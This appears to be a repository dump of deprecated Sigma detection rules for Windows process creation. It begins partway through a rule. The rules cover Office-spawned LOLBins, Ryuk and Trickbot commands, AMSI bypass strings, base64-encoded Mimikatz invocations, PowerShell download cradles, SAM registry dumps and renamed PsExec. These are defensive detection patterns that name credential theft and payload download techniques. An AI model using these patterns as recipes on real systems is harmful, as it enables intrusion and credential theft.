https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ author: Florian Roth (Nextron Systems) date: 2022/01/04 modified: 2023/04/24 tags: - attack.defense_evasion - attack.t1036 - attack.t1003.001 logsource: category: process_creation product: windows detection: selection1: Image|endswith: '\rdrleakdiag.exe' CommandLine|contains: '/fullmemdmp' selection2: CommandLine|contains|all: - '/fullmemdmp' - ' /o ' - ' /p ' condition: selection1 or 
selection2 falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_lolbins_by_office_applications.yml ================================================ title: New Lolbin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 status: deprecated description: This rule will monitor any office app that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)' date: 2021/08/23 modified: 2023/02/04 tags: - attack.t1204.002 - attack.t1047 - attack.t1218.010 - attack.execution - attack.defense_evasion logsource: product: windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. 
selection: Image|endswith: - '\regsvr32.exe' - '\rundll32.exe' - '\msiexec.exe' - '\mshta.exe' - '\verclsid.exe' - '\msdt.exe' - '\control.exe' - '\msidb.exe' ParentImage|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' - '\msaccess.exe' - '\mspub.exe' - '\eqnedt32.exe' - '\visio.exe' - '\wordpad.exe' - '\wordview.exe' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_mal_ryuk.yml ================================================ title: Ryuk Ransomware Command Line Activity id: 0acaad27-9f02-4136-a243-c357202edd74 related: - id: c37510b8-2107-4b78-aa32-72f251e7a844 type: similar status: deprecated description: Detects Ryuk Ransomware command lines references: - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ author: Vasiliy Burov date: 2019/08/06 modified: 2023/02/03 tags: - attack.execution - attack.t1204 logsource: category: process_creation product: windows detection: selection1: Image|endswith: - '\net.exe' - '\net1.exe' CommandLine|contains: 'stop' selection2: CommandLine|contains: - 'samss' - 'audioendpointbuilder' - 'unistoresvc_' condition: all of selection* falsepositives: - Unlikely level: critical ================================================ FILE: deprecated/windows/proc_creation_win_malware_trickbot_recon_activity.yml ================================================ title: Trickbot Malware Reconnaissance Activity id: 410ad193-a728-4107-bc79-4419789fcbf8 related: - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 type: similar status: deprecated description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. 
references: - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/ - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ author: David Burkett, Florian Roth date: 2019/12/28 modified: 2023/04/28 tags: - attack.discovery - attack.t1482 logsource: category: process_creation product: windows detection: selection: ParentImage|endswith: '\cmd.exe' Image|endswith: '\nltest.exe' CommandLine|contains: '/domain_trusts /all_trusts' condition: selection falsepositives: - Rare System Admin Activity level: high ================================================ FILE: deprecated/windows/proc_creation_win_mavinject_proc_inj.yml ================================================ title: MavInject Process Injection id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 status: deprecated description: Detects process injection using the signed Windows tool Mavinject32.exe author: Florian Roth (Nextron Systems) references: - https://twitter.com/gN3mes1s/status/941315826107510784 - https://reaqta.com/2017/12/mavinject-microsoft-injector/ - https://twitter.com/Hexacorn/status/776122138063409152 date: 2018/12/12 modified: 2022/12/19 tags: - attack.t1055.001 - attack.t1218 logsource: category: process_creation product: windows detection: selection: CommandLine|contains: ' /INJECTRUNNING ' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_msdt_diagcab.yml ================================================ title: Execute MSDT.EXE Using Diagcab File id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 status: deprecated description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 references: - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab - 
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0 - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd author: GossiTheDog, frack113 date: 2022/06/09 modified: 2023/02/06 tags: - attack.defense_evasion - attack.t1202 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: '\msdt.exe' - OriginalFileName: 'msdt.exe' selection_cmd: CommandLine|contains: - ' /cab' - ' -cab' condition: all of selection_* falsepositives: - Legitimate usage of ".diagcab" files level: high ================================================ FILE: deprecated/windows/proc_creation_win_new_service_creation.yml ================================================ title: New Service Creation id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab status: deprecated description: Detects creation of a new service. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community date: 2019/10/21 modified: 2023/02/20 tags: - attack.persistence - attack.privilege_escalation - attack.t1543.003 logsource: category: process_creation product: windows detection: selection_sc: Image|endswith: '\sc.exe' CommandLine|contains|all: - 'create' - 'binPath' selection_posh: CommandLine|contains|all: - 'New-Service' - '-BinaryPathName' condition: 1 of selection* falsepositives: - Legitimate administrator or user creates a service for legitimate reasons. level: low ================================================ FILE: deprecated/windows/proc_creation_win_nslookup_pwsh_download_cradle.yml ================================================ title: Nslookup PwSh Download Cradle id: 72671447-4352-4413-bb91-b85569687135 status: deprecated description: This rule tries to detect powershell download cradles, e.g. powershell . 
(nslookup -q=txt http://some.owned.domain.com)[-1] references: - https://twitter.com/alh4zr3d/status/1566489367232651264 author: Zach Mathis (@yamatosecurity) date: 2022/09/06 modified: 2022/12/14 # Deprecation date tags: - attack.command_and_control - attack.t1105 - attack.t1071.004 logsource: category: process_creation product: windows detection: selection: ParentImage|endswith: '\powershell.exe' Image|contains: nslookup CommandLine|contains: '=txt ' condition: selection level: medium ================================================ FILE: deprecated/windows/proc_creation_win_odbcconf_susp_exec.yml ================================================ title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe id: 65d2be45-8600-4042-b4c0-577a1ff8a60e status: deprecated description: Detects defence evasion attempt via odbcconf.exe execution to load DLL references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://twitter.com/Hexacorn/status/1187143326673330176 - https://redcanary.com/blog/raspberry-robin/ - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community date: 2019/10/25 modified: 2023/05/22 tags: - attack.defense_evasion - attack.t1218.008 logsource: category: process_creation product: windows detection: selection_1_img: - Image|endswith: '\odbcconf.exe' - OriginalFileName: 'odbcconf.exe' selection_1_cli: CommandLine|contains: - '-a' - '-f' - '/a' - '/f' - 'regsvr' selection_2_parent: ParentImage|endswith: '\odbcconf.exe' selection_2_img: - Image|endswith: '\rundll32.exe' - OriginalFileName: 'RUNDLL32.EXE' condition: all of selection_1_* or all of selection_2_* falsepositives: - Legitimate use of odbcconf.exe by legitimate user level: medium ================================================ FILE: 
deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml ================================================ title: Excel Proxy Executing Regsvr32 With Payload id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 status: deprecated description: | Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)' date: 2021/08/23 modified: 2022/12/02 tags: - attack.t1204.002 - attack.t1047 - attack.t1218.010 - attack.execution - attack.defense_evasion logsource: product: windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. 
selection_img: - Image|endswith: '\wbem\WMIC.exe' - OriginalFileName: 'wmic.exe' selection_other: CommandLine|contains: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' ParentImage|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' CommandLine|contains|all: - 'process' - 'create' - 'call' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml ================================================ title: Excel Proxy Executing Regsvr32 With Payload Alternate id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 status: deprecated description: | Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)' date: 2021/08/23 modified: 2022/12/02 tags: - attack.t1204.002 - attack.t1047 - attack.t1218.010 - attack.execution - attack.defense_evasion logsource: product: windows category: process_creation detection: #useful_information: add more LOLBins to the rules logic of your choice. 
selection1: CommandLine|contains: - 'regsvr32' - 'rundll32' - 'msiexec' - 'mshta' - 'verclsid' selection2: - Image|endswith: '\wbem\WMIC.exe' - CommandLine|contains: 'wmic ' selection3: ParentImage|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' selection4: CommandLine|contains|all: - 'process' - 'create' - 'call' condition: all of selection* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_office_spawning_wmi_commandline.yml ================================================ title: Office Applications Spawning Wmi Cli Alternate id: 04f5363a-6bca-42ff-be70-0d28bf629ead status: deprecated description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule) date: 2021/08/23 modified: 2023/02/04 tags: - attack.t1204.002 - attack.t1047 - attack.t1218.010 - attack.execution - attack.defense_evasion logsource: product: windows category: process_creation detection: #useful_information: Add more office applications to the rule logic of choice selection1: - Image|endswith: '\wbem\WMIC.exe' - CommandLine|contains: 'wmic ' selection2: ParentImage|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' - '\msaccess.exe' - '\mspub.exe' - '\eqnedt32.exe' - '\visio.exe' condition: all of selection* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_possible_applocker_bypass.yml ================================================ title: Possible Applocker Bypass id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719 status: deprecated description: Detects execution of 
executables that can be used to bypass Applocker whitelisting references: - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md author: juju4 date: 2019/01/16 modified: 2022/11/03 tags: - attack.defense_evasion - attack.t1218.004 - attack.t1218.009 - attack.t1127.001 - attack.t1218.005 - attack.t1218 # no way to map 1:1, so the technique level is required logsource: category: process_creation product: windows detection: selection: CommandLine|contains: - '\msdt.exe' - '\installutil.exe' - '\regsvcs.exe' - '\regasm.exe' #- '\regsvr32.exe' # too many FPs, very noisy - '\msbuild.exe' - '\ieexec.exe' #- '\mshta.exe' #- '\csc.exe' condition: selection falsepositives: - False positives depend on scripts and administrative tools used in the monitored environment - Using installutil to add features for .NET applications (primarily would occur in developer environments) level: low ================================================ FILE: deprecated/windows/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml ================================================ title: PowerShell AMSI Bypass Pattern id: 4f927692-68b5-4267-871b-073c45f4f6fe status: deprecated description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. 
author: '@Kostastsale' references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ date: 2022/11/04 modified: 2023/02/03 tags: - attack.defense_evasion - attack.t1562.001 - attack.execution logsource: product: windows category: process_creation detection: selection1: Image|endswith: - '\powershell.exe' - '\pwsh.exe' - '\powershell_ise.exe' CommandLine|contains|all: - '[Ref].Assembly.GetType' - 'SetValue($null,$true)' - 'NonPublic,Static' condition: selection1 falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml ================================================ title: Malicious Base64 Encoded Powershell Invoke Cmdlets id: fd6e2919-3936-40c9-99db-0aa922c356f7 related: - id: 6385697e-9f1b-40bd-8817-f4a91f40508e type: similar status: deprecated description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ author: pH-T (Nextron Systems) date: 2022/05/31 modified: 2023/01/30 tags: - attack.execution - attack.t1059.001 - attack.defense_evasion - attack.t1027 logsource: category: process_creation product: windows detection: selection: CommandLine|contains: # Invoke-BloodHound - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' # Invoke-Mimikatz - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' # Invoke-WMIExec - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' condition: selection fields: - CommandLine falsepositives: - Unlikely level: high ================================================ FILE: 
deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml ================================================ title: Base64 Encoded Listing of Shadowcopy id: 47688f1b-9f51-4656-b013-3cc49a166a36 status: deprecated description: Detects base64 encoded listing Win32_Shadowcopy references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar author: Christian Burkard (Nextron Systems) date: 2022/03/01 modified: 2023/01/30 tags: - attack.execution - attack.t1059.001 - attack.defense_evasion - attack.t1027 logsource: category: process_creation product: windows detection: selection: # Win32_Shadowcopy | ForEach-Object CommandLine|contains: - 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA' - 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A' - 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA' condition: selection fields: - CommandLine - ParentCommandLine falsepositives: - Unlikely level: high ================================================ FILE: deprecated/windows/proc_creation_win_powershell_base64_shellcode.yml ================================================ title: Potential PowerShell Base64 Encoded Shellcode id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8 status: deprecated description: Detects potential powershell Base64 encoded Shellcode references: - https://twitter.com/cyb3rops/status/1063072865992523776 author: Florian Roth (Nextron Systems) date: 2018/11/17 modified: 2023/04/06 tags: - attack.defense_evasion - attack.t1027 logsource: category: process_creation product: windows detection: selection: CommandLine|contains: - 'OiCAAAAYInlM' - 'OiJAAAAYInlM' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_powershell_bitsjob.yml ================================================ title: 
Suspicious Bitsadmin Job via PowerShell id: f67dbfce-93bc-440d-86ad-a95ae8858c90 status: deprecated description: Detect download by BITS jobs via PowerShell references: - https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md author: Endgame, JHasenbusch (ported to sigma for oscd.community) date: 2018/10/30 modified: 2022/11/21 tags: - attack.defense_evasion - attack.persistence - attack.t1197 logsource: category: process_creation product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: 'Start-BitsTransfer' condition: selection fields: - ComputerName - User - CommandLine falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_powershell_download_cradles.yml ================================================ title: PowerShell Web Download id: 6e897651-f157-4d8f-aaeb-df8151488385 status: deprecated description: Detects suspicious ways to download files or content using PowerShell references: - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd author: Florian Roth (Nextron Systems) date: 2022-03-24 modified: 2025-07-18 tags: - attack.command-and-control - attack.execution - attack.t1059.001 - attack.t1105 logsource: product: windows category: process_creation detection: selection: CommandLine|contains: - '.DownloadString(' - '.DownloadFile(' - 'Invoke-WebRequest ' - 'iwr ' condition: selection falsepositives: - Scripts or tools that download files level: medium ================================================ FILE: deprecated/windows/proc_creation_win_powershell_service_modification.yml ================================================ title: Stop Or Remove Antivirus Service id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b 
status: deprecated description: | Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ author: frack113 date: 2021/07/07 modified: 2023/03/04 tags: - attack.defense_evasion - attack.t1562.001 logsource: category: process_creation product: windows detection: selection_action: CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_product: CommandLine|contains: # Feel free to add more service name - ' McAfeeDLPAgentService' - ' Trend Micro Deep Security Manager' - ' TMBMServer' - 'Sophos' - 'Symantec' condition: all of selection* fields: - ComputerName - User - CommandLine - ParentCommandLine falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_powershell_susp_ps_downloadfile.yml ================================================ title: PowerShell DownloadFile id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5 status: deprecated # Deprecated in favor of 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html author: Florian Roth (Nextron Systems) date: 2020-08-28 modified: 2025-10-20 tags: - attack.execution - attack.t1059.001 - attack.command-and-control - attack.t1104 - attack.t1105 logsource: category: process_creation product: windows detection: selection: CommandLine|contains|all: - 'powershell' - '.DownloadFile' - 
'System.Net.WebClient' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_powershell_xor_encoded_command.yml ================================================ title: Potential Xor Encoded PowerShell Command id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 related: - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f type: similar status: deprecated description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton date: 2022/07/06 modified: 2023/01/30 tags: - attack.defense_evasion - attack.t1027 - attack.execution - attack.t1059.001 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: - '\powershell.exe' - '\pwsh.exe' - OriginalFileName: - 'PowerShell.exe' - 'pwsh.dll' selection_cli: CommandLine|contains|all: - 'ForEach' - 'Xor' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_reg_dump_sam.yml ================================================ title: Registry Dump of SAM Creds and Secrets id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e related: - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 type: similar status: deprecated description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets author: frack113 date: 2022/01/05 modified: 2023/02/04 tags: - 
attack.credential_access - attack.t1003.002 logsource: category: process_creation product: windows detection: selection_reg: CommandLine|contains: ' save ' selection_key: CommandLine|contains: - HKLM\sam - HKLM\system - HKLM\security condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_regsvr32_anomalies.yml ================================================ title: Regsvr32 Anomaly id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d status: deprecated description: Detects various anomalies in relation to regsvr32.exe references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ author: Florian Roth (Nextron Systems), oscd.community, Tim Shelton date: 2019/01/16 modified: 2023/05/26 tags: - attack.defense_evasion - attack.t1218.010 - car.2019-04-002 - car.2019-04-003 logsource: category: process_creation product: windows detection: selection1: Image|endswith: '\regsvr32.exe' CommandLine|contains: '\Temp\' selection2: Image|endswith: '\regsvr32.exe' ParentImage|endswith: - '\powershell.exe' - '\pwsh.exe' - '\powershell_ise.exe' selection3: Image|endswith: '\regsvr32.exe' ParentImage|endswith: '\cmd.exe' selection4a: Image|endswith: '\regsvr32.exe' CommandLine|contains|all: - '/i:' - 'http' CommandLine|endswith: 'scrobj.dll' selection4b: Image|endswith: '\regsvr32.exe' CommandLine|contains|all: - '/i:' - 'ftp' CommandLine|endswith: 'scrobj.dll' selection5: Image|endswith: - '\cscript.exe' - '\wscript.exe' ParentImage|endswith: '\regsvr32.exe' selection6: Image|endswith: '\EXCEL.EXE' CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' selection7: ParentImage|endswith: '\mshta.exe' Image|endswith: '\regsvr32.exe' selection8: Image|endswith: '\regsvr32.exe' CommandLine|contains: - '\AppData\Local' - 'C:\Users\Public' selection9: # suspicious extensions 
https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 Image|endswith: '\regsvr32.exe' CommandLine|endswith: - '.jpg' - '.jpeg' - '.png' - '.gif' - '.bin' - '.tmp' - '.temp' - '.txt' filter1: CommandLine|contains: - '\AppData\Local\Microsoft\Teams' - '\AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll' filter2: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' filter_legitimate: CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll' condition: 1 of selection* and not 1 of filter* fields: - CommandLine - ParentCommandLine falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_renamed_paexec.yml ================================================ title: Renamed PaExec Execution id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b status: deprecated description: Detects execution of renamed paexec via imphash and executable product string references: - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf author: Jason Lynch date: 2019/04/17 modified: 2023/02/14 tags: - attack.defense_evasion - attack.t1036.003 - attack.g0046 - car.2013-05-009 - attack.execution - attack.t1569.002 logsource: category: process_creation product: windows detection: selection: - Product|contains: 'PAExec' - Hashes|contains: - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: Image|contains: 'paexec' condition: selection and not filter falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_renamed_powershell.yml ================================================ title: Renamed PowerShell id: 
d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 status: deprecated description: Detects the execution of a renamed PowerShell often used by attackers or malware references: - https://twitter.com/christophetd/status/1164506034720952320 author: Florian Roth (Nextron Systems), frack113 date: 2019/08/22 modified: 2023/01/18 tags: - car.2013-05-009 - attack.defense_evasion - attack.t1036.003 logsource: product: windows category: process_creation detection: selection: Description|startswith: - 'Windows PowerShell' - 'pwsh' Company: 'Microsoft Corporation' filter: Image|endswith: - '\powershell.exe' - '\powershell_ise.exe' - '\pwsh.exe' condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_renamed_psexec.yml ================================================ title: Renamed PsExec id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 status: deprecated description: Detects the execution of a renamed PsExec often used by attackers or malware references: - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks author: Florian Roth (Nextron Systems) date: 2019/05/21 modified: 2023/03/04 tags: - car.2013-05-009 - attack.defense_evasion - attack.t1036.003 logsource: product: windows category: process_creation detection: selection: Description: 'Execute processes remotely' Product: 'Sysinternals PsExec' filter: Image|endswith: - '\PsExec.exe' - '\PsExec64.exe' condition: selection and not filter falsepositives: - Software that illegally integrates PsExec in a renamed form - Administrators that have renamed PsExec and no one knows why level: high ================================================ FILE: deprecated/windows/proc_creation_win_renamed_rundll32.yml ================================================ title: Renamed Rundll32.exe Execution id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 status: deprecated 
description: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection references: - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ author: Florian Roth (Nextron Systems) date: 2022/06/08 modified: 2023/01/18 logsource: category: process_creation product: windows detection: selection: OriginalFileName: 'RUNDLL32.EXE' filter: Image|endswith: '\rundll32.exe' condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_root_certificate_installed.yml ================================================ title: Root Certificate Installed id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc related: - id: 42821614-9264-4761-acfc-5772c3286f76 type: derived status: deprecated description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: 'oscd.community, @redcanary, Zach Stanford @svch0st' date: 2020/10/10 modified: 2023/03/05 tags: - attack.defense_evasion - attack.t1553.004 logsource: category: process_creation product: windows detection: selection1: Image|endswith: '\certutil.exe' # Example: certutil -addstore -f -user ROOT CertificateFileName.der CommandLine|contains|all: - '-addstore' - 'root' selection2: Image|endswith: '\CertMgr.exe' # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all CommandLine|contains|all: - '/add' - 'root' condition: selection1 or selection2 falsepositives: - Help Desk or IT may need to manually add a corporate Root CA on occasion. 
